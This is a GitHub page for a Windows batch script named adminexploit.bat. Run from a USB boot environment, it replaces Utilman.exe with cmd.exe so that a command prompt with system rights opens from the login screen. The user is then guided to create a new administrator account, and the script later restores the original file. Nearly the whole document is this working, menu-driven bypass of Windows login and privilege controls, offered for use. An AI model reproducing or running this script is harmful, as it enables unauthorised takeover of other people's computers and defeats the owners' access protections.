-
Notifications
You must be signed in to change notification settings - Fork 9
/
adminexploit.bat
202 lines (143 loc) · 4.07 KB
/
adminexploit.bat
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
:start
cls
@echo off
color 0a
title -- AdminExploit by DaddyParodz and MaRCoilBRaZ --
echo -- made by DaddyParodz and MaRCoilBRaZ --
echo -----------------------------------------------------------------------------------------------
echo select an option:
echo 1 - run this if you have booted the usb
echo 2 - run this to create an account and give it administrator privileges
echo 3 - run this to restore Utilman.exe (or simply from the desktop when you're done with admin account)
echo help - show the tutorial
echo exit - well, this explain itself
set /p choice=
if %choice% == 1 goto 1bat
if %choice% == 2 goto 2bat
if %choice% == 3 goto 3bat
if %choice% == help goto tutorial
if %choice% == exit exit
else goto eskere
:eskere
cls
echo -- please type only the option in the list --
echo -- every other option will bring you to this window --
pause
goto start
:1bat
cls
@echo off
color 0a
title -- cmd utilman.exe --
echo -- Made by DaddyParodz and MaRCoilBRaZ --
echo -- starting backup --
echo.
C:
cd Windows
cd System32
copy C:\Windows\System32\Utilman.exe C:\Windows\System32\Utilman.exe.backup
echo.
timeout /t 3
cls
echo --- Utilman.exe.backup created ---
echo.
echo ----------------------------------------------------------------------------------------------
echo -- replacing Utilman.exe with CMD administrator --
xcopy C:\Windows\System32\cmd.exe C:\Windows\System32\Utilman.exe
echo.
timeout /t 3
cls
echo --- cmd replace done --
echo.
pause
echo --- restarting system ---
echo -- please remove usb device after the screen goes black --
timeout /t 5
wpeutil reboot
exit
:2bat
cls
@echo off
color 0a
start
echo -- Made by DaddyParodz and MaRCoilBRaZ --
title -- admin account --
echo -- now is your turn --
echo ------------------------------------------------------------------------------------------------
start notepad "copypaste.txt"
echo ------------------------------------------------------------------------------------------------
echo -- write out this 2 command from the txt file in the cmd window that just appeared --
echo -- remember to replace the [name] and [password] with what you want --
pause
exit
:3bat
@shift /0
@echo off
cls
color 0a
title -- THIS WILL RESTORE THE ORIGINAL Utilman.exe --
echo -- Made by DaddyParodz and MaRCoilBRaZ --
echo ----------------------------------------------------------------------------------------
echo -- execute this command only if you are logged in as admin --
echo -- if you execute this on the "select user" screen, please close this command and log in as admin --
echo -- if you don't follow my instruction this command will not work --
pause
cls
echo are you logged in as administrator ? (Y/N)
set /p login=
if %login% == y goto start
if %login% == n goto escape
pause
:escape
cls
echo -- execute this command only if you are logged in as admin --
pause
exit
:start
echo select 2 (again, from usb boot cmd, not when logged into your new account) if 1 is not working (1/2)
set /p login=
if %login% == 1 goto 1
if %login% == 2 goto 2
:1
cls
echo -- restoring utilman.exe --
timeout /t 3
cls
echo.
echo Getting privileges over Utilman.exe
icacls C:\Windows\System32\Utilman.exe /grant %username%:F
del C:\Windows\System32\Utilman.exe
icacls C:\Windows\System32\Utilman.exe.backup /grant %username%:F
xcopy C:\Windows\System32\Utilman.exe.backup C:\Windows\System32\Utilman.exe
rem del C:\Windows\System32\Utilman.exe.backup
echo.
echo -- Original Utilman.exe RESTORED. --
echo.
echo read logs up here, if it didn't work, try selecting 2 instead of 1
echo bye bye
echo.
pause
echo.
exit
:2
@echo off
cls
C:
icacls C:\Windows\System32\Utilman.exe /grant %username%:F
del C:\Windows\System32\Utilman.exe
copy Utilman.exe C:\Windows\System32\Utilman.exe
echo .
echo read the errors up here and check if it has successfully copied Utilman.exe from the usb to sys32
echo if not, read the manual mode tutorial on github or "tutorial" command.
echo.
echo bye.
pause
exit
:tutorial
@echo off
color 0f
cls
echo -- the tutorial will be opened in notepad --
start notepad "tutorial.txt"
timeout /t 3
goto start